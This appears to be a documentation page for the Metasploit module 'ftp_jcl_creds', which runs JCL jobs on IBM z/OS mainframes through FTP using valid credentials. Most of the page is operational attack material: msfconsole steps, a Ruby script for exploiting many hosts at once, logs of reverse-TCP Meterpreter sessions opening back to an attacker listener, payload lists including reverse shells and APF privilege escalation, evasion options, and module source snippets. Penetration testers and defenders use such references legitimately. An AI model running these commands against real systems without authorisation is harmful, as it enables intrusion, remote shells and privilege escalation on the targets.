FTP JCL Execution - Metasploit
This page contains detailed information about how to use the exploit/mainframe/ftp/ftp_jcl_creds metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: FTP JCL Execution
Module: exploit/mainframe/ftp/ftp_jcl_creds
Source code: modules/exploits/mainframe/ftp/ftp_jcl_creds.rb
Disclosure date: 2013-05-12
Last modification time: 2020-09-22 02:56:51 +0000
Supported architecture(s): cmd
Supported platform(s): Mainframe
Target service / protocol: ftp
Target network port(s): 21, 2121
List of CVEs: -
(Submit JCL to z/OS via FTP and SITE FILE=JES. This exploit requires valid credentials on the target system)
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
Using ftp_jcl_creds against a single host
Normally, you can use exploit/mainframe/ftp/ftp_jcl_creds this way:
msf > use exploit/mainframe/ftp/ftp_jcl_creds
msf exploit(ftp_jcl_creds) > show targets
... a list of targets ...
msf exploit(ftp_jcl_creds) > set TARGET target-id
msf exploit(ftp_jcl_creds) > show options
... show and set options ...
msf exploit(ftp_jcl_creds) > exploit
Using ftp_jcl_creds against multiple hosts
But it looks like this is a remote exploit module, which means you can also engage multiple hosts.
First, create a list of IPs you wish to exploit with this module. One IP per line.
Second, set up a background payload listener. This payload should be the same as the one your ftp_jcl_creds will be using:
- Do:
use exploit/multi/handler
- Do:
set PAYLOAD [payload]
- Set other options required by the payload
- Do:
set EXITONSESSION false
- Do:
run -j
At this point, you should have a payload listening.
Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:
<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'
File.open(ip_list, 'rb').each_line do |ip|
print_status("Trying against #{ip}")
run_single("use exploit/mainframe/ftp/ftp_jcl_creds")
run_single("set RHOST #{ip}")
run_single("set DisablePayloadHandler true")
#
# Set a payload that's the same as the handler.
# You might also need to add more run_single commands to configure other
# payload options.
#
run_single("set PAYLOAD [payload name]")
run_single("run")
end
</ruby>
Next, run the resource script in the console:
msf > resource [path-to-resource-script]
And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:
msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80
RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600
[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
z/OS JCL authorized FTP-base command execution - hints & tips
In order to use this exploit, you must have valid credentials on the target z/OS system. The credentials must have access to upload files via FTP. If in doubt, use the check function of the exploit.
Vulnerable Application
This exploit was tested on the ftp daemons for z/OS version 1.13 / 2.1
Payloads
If the exploit works, any JCL the user has rights to submit can be submitted.
See cmd type payloads under mainframe with jcl in the payload name, e.g.:
msf exploit(ftp_jcl_creds) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/mainframe/apf_privesc_jcl normal JCL to escalate privilages via APF LIB
cmd/mainframe/bind_shell_jcl normal Z/OS (MVS) Command Shell, Bind TCP
cmd/mainframe/generic_jcl normal Generic JCL Test for Mainframe Exploits
cmd/mainframe/reverse_shell_jcl normal Z/OS (MVS) Command Shell, Reverse TCP
Verification Steps
A successful check of the exploit will look like this:
msf exploit(ftp_jcl_creds) > set FTPUSER ftptest
FTPUSER => ftptest
msf exploit(ftp_jcl_creds) > set FTPPASS password
FTPPASS => password
msf exploit(ftp_jcl_creds) > set RHOST 10.10.10.1
RHOST => 10.10.10.1
msf exploit(ftp_jcl_creds) > info
Name: FTP JCL Execution
Module: exploit/mainframe/ftp/ftp_jcl_creds
Platform: Mainframe
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2013-05-12
Available targets:
Id Name
-- ----
0 auto
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS password no The password for the specified username
FTPUSER ftptest no The username to authenticate as
RHOST 10.10.10.1 yes The target address
RPORT 21 yes The target port
SLEEP 5 no Time to wait before checking if job has completed.
Payload information:
Description:
Submit JCL to z/OS via FTP and SITE FILE=JES. This exploit requires
valid credentials on the target system
msf exploit(ftp_jcl_creds) > check
[+] 10.10.10.1:21 - Successfully connected to FTP server.
[*] 10.10.10.1:21 - Found IBM z/OS Banner and JES commands accepted
[+] The target is vulnerable.
msf exploit(ftp_jcl_creds) >
Debugging
If the exploit or check is not working, turn on the VERBOSE and FTPDEBUG settings of the exploit and run. The output should look similar to the below, on a vulnerable system.
msf exploit(ftp_jcl_creds) > set FTPDEBUG true
FTPDEBUG => true
msf exploit(ftp_jcl_creds) > set VERBOSE true
VERBOSE => true
msf exploit(ftp_jcl_creds) > check
[*] 10.10.10.1:21 - Connecting to FTP server 10.10.10.1:21...
[*] 10.10.10.1:21 - FTP recv: "220-FTPD1 IBM FTP CS V2R1 at ZOS.EXAMPLE.COM, 16:52:31 on 2016-04-27.\r\n220 Connection will close if idle for more than 5 minutes.\r\n"
[*] 10.10.10.1:21 - Connected to target FTP server.
[*] 10.10.10.1:21 - Authenticating as ftptest with password password...
[*] 10.10.10.1:21 - FTP send: "USER ftptest\r\n"
[*] 10.10.10.1:21 - FTP recv: "331 Send password please.\r\n"
[*] 10.10.10.1:21 - Sending password...
[*] 10.10.10.1:21 - FTP send: "PASS password\r\n"
[*] 10.10.10.1:21 - FTP recv: "230 FTPTEST is logged on. Working directory is \"FTPTEST.\".\r\n"
[+] 10.10.10.1:21 - Successfully connected to FTP server.
[*] 10.10.10.1:21 - FTP send: "site file=jes\r\n"
[*] 10.10.10.1:21 - FTP recv: "200 SITE command was accepted\r\n"
[*] 10.10.10.1:21 - Found IBM z/OS Banner and JES commands accepted
[+] The target is vulnerable.
msf exploit(ftp_jcl_creds) >
Notes
The job run will leave a joblog for the credentials used.
Go back to menu.
Msfconsole Usage
Here is how the mainframe/ftp/ftp_jcl_creds exploit module looks in the msfconsole:
msf6 > use exploit/mainframe/ftp/ftp_jcl_creds
[*] No payload configured, defaulting to generic/shell_reverse_tcp
msf6 exploit(mainframe/ftp/ftp_jcl_creds) > show info
Name: FTP JCL Execution
Module: exploit/mainframe/ftp/ftp_jcl_creds
Platform: Mainframe
Arch: cmd
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2013-05-12
Provided by:
Bigendian Smalls
mainframed a.k.a. soldier of fortran
S&Oxballs a.k.a. chiefascot
Available targets:
Id Name
-- ----
0 Automatic
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS [email protected] no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 21 yes The target port (TCP)
SLEEP 5 no Time to wait before checking if job has completed.
Payload information:
Description:
(Submit JCL to z/OS via FTP and SITE FILE=JES. This exploit requires
valid credentials on the target system)
Module Options
This is a complete list of options available in the mainframe/ftp/ftp_jcl_creds exploit:
msf6 exploit(mainframe/ftp/ftp_jcl_creds) > show options
Module options (exploit/mainframe/ftp/ftp_jcl_creds):
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS [email protected] no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 21 yes The target port (TCP)
SLEEP 5 no Time to wait before checking if job has completed.
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.204.3 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
Advanced Options
Here is a complete list of advanced options supported by the mainframe/ftp/ftp_jcl_creds exploit:
msf6 exploit(mainframe/ftp/ftp_jcl_creds) > show advanced
Module advanced options (exploit/mainframe/ftp/ftp_jcl_creds):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
ConnectTimeout 10 yes Maximum number of seconds to establish a TCP connection
ContextInformationFile no The information file that contains context information
DisablePayloadHandler false no Disable the handler code for the selected payload
EnableContextEncoding false no Use transient context when encoding payloads
FTPDEBUG false no Whether or not to print verbose debug statements
FTPTimeout 16 yes The number of seconds to wait for a reply from an FTP command
PassiveMode false no Set true for extended passive (EPSV) ftp mode.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCipher no String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
SSLVerifyMode PEER no SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 2 no Additional delay in seconds to wait for a session
Payload advanced options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
ARCH no The architecture that is being targeted
PLATFORM no The platform that is being targeted
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the mainframe/ftp/ftp_jcl_creds module can exploit:
msf6 exploit(mainframe/ftp/ftp_jcl_creds) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the mainframe/ftp/ftp_jcl_creds exploit:
msf6 exploit(mainframe/ftp/ftp_jcl_creds) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/mainframe/apf_privesc_jcl normal No JCL to Escalate Privileges
1 payload/cmd/mainframe/bind_shell_jcl normal No Z/OS (MVS) Command Shell, Bind TCP
2 payload/cmd/mainframe/generic_jcl normal No Generic JCL Test for Mainframe Exploits
3 payload/cmd/mainframe/reverse_shell_jcl normal No Z/OS (MVS) Command Shell, Reverse TCP
4 payload/generic/custom normal No Custom Payload
5 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
6 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
Evasion Options
Here is the full list of possible evasion options supported by the mainframe/ftp/ftp_jcl_creds exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(mainframe/ftp/ftp_jcl_creds) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
TCP::max_send_size 0 no Maxiumum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
<RHOST>:<RPORT> - Failed to connect to FTP server
Here is a relevant code snippet related to the "<RHOST>:<RPORT> - Failed to connect to FTP server" error message:
47: def check
48: ##
49: # Connect to get the FTP banner and check target OS
50: ##
51: if !connect_login
52: fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failed to connect to FTP server")
53: else
54: print_good("Successfully connected to FTP server.")
55: end
56: test_jes = send_cmd(['site', 'file=jes'])
57:
Found IBM z/OS Banner but SITE FILE=JES failed. Try anyway!
Here is a relevant code snippet related to the "Found IBM z/OS Banner but SITE FILE=JES failed. Try anyway!" error message:
66: case test_jes
67: when /200 SITE/
68: print_status("Found IBM z/OS Banner and JES commands accepted")
69: return Exploit::CheckCode::Vulnerable
70: else
71: print_error("Found IBM z/OS Banner but SITE FILE=JES failed. Try anyway!")
72: return Exploit::CheckCode::Detected
73: end
74:
75: ##
76: # Return the Safe flag if system is not exploitable
We could not recognize the server banner: <BANNER.STRIP>
Here is a relevant code snippet related to the "We could not recognize the server banner: <BANNER.STRIP>" error message:
74:
75: ##
76: # Return the Safe flag if system is not exploitable
77: ##
78: else
79: print_status("We could not recognize the server banner: #{banner.strip}")
80: return Exploit::CheckCode::Safe
81: end
82: end
83:
84: ##
<RHOST>:<RPORT> - Failed to connect to FTP server
Here is a relevant code snippet related to the "<RHOST>:<RPORT> - Failed to connect to FTP server" error message:
84: ##
85: # Exploit the target system by submitting a JCL job via FTP
86: ##
87: def exploit
88: if !connect_login
89: fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} - Failed to connect to FTP server")
90: else
91: print_good("Successfully connected to FTP server.")
92: end
93:
94: send_cmd(['site', 'file=jes'])
<RHOST>:<RPORT> - Failed to upload JCL to FTP server
Here is a relevant code snippet related to the "<RHOST>:<RPORT> - Failed to upload JCL to FTP server" error message:
97: jcl_file_name = "#{Rex::Text.rand_text_alpha(8).upcase}"
98: print_status("Uploading JCL file: #{jcl_file_name}")
99:
100: res = send_cmd_data(['put', jcl_file_name], payload.encoded)
101: if res.nil?
102: fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} - Failed to upload JCL to FTP server")
103: end
104:
105: job_num = res.lines.first.split.last
106: print_good("Job Submitted. Job number is #{job_num}")
107:
Go back to menu.
Related Pull Requests
- #14202 Merged Pull Request: Implement the zeitwerk autoloader within lib/msf/core
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #10505 Merged Pull Request: Add post authentication information in modules
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #6834 Merged Pull Request: Authorized FTP JCL exploit for z/OS
Go back to menu.
See Also
Check also the following modules related to this module:
- auxiliary/gather/coldfusion_pwd_props
- auxiliary/gather/konica_minolta_pwd_extract
- auxiliary/gather/xerox_pwd_extract
- auxiliary/scanner/http/titan_ftp_admin_pwd
- auxiliary/scanner/printer/canon_iradv_pwd_extract
- exploit/linux/misc/ib_pwd_db_aliased
- exploit/windows/ftp/ftpshell51_pwd_reply
- exploit/windows/ftp/xftp_client_pwd
- post/windows/gather/credentials/enum_picasa_pwds
- exploit/linux/samba/chain_reply
- exploit/windows/ftp/32bitftp_list_reply
- exploit/windows/ftp/aasync_list_reply
- exploit/windows/ftp/filewrangler_list_reply
- exploit/windows/ftp/ftppad_list_reply
- exploit/windows/ftp/ftpsynch_list_reply
- exploit/windows/ftp/gekkomgr_list_reply
- exploit/windows/ftp/leapftp_list_reply
- exploit/windows/ftp/leapftp_pasv_reply
- exploit/windows/ftp/odin_list_reply
- exploit/windows/ftp/seagull_list_reply
- auxiliary/fuzzers/ftp/ftp_pre_post
- auxiliary/scanner/ftp/ftp_login
- auxiliary/scanner/ftp/ftp_version
- payload/cmd/mainframe/apf_privesc_jcl
- payload/cmd/mainframe/bind_shell_jcl
- payload/cmd/mainframe/generic_jcl
- payload/cmd/mainframe/reverse_shell_jcl
- payload/mainframe/shell_reverse_tcp
Authors
- Bigendian Smalls
- mainframed a.k.a. soldier of fortran
- S&Oxballs a.k.a. chiefascot
Version
This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.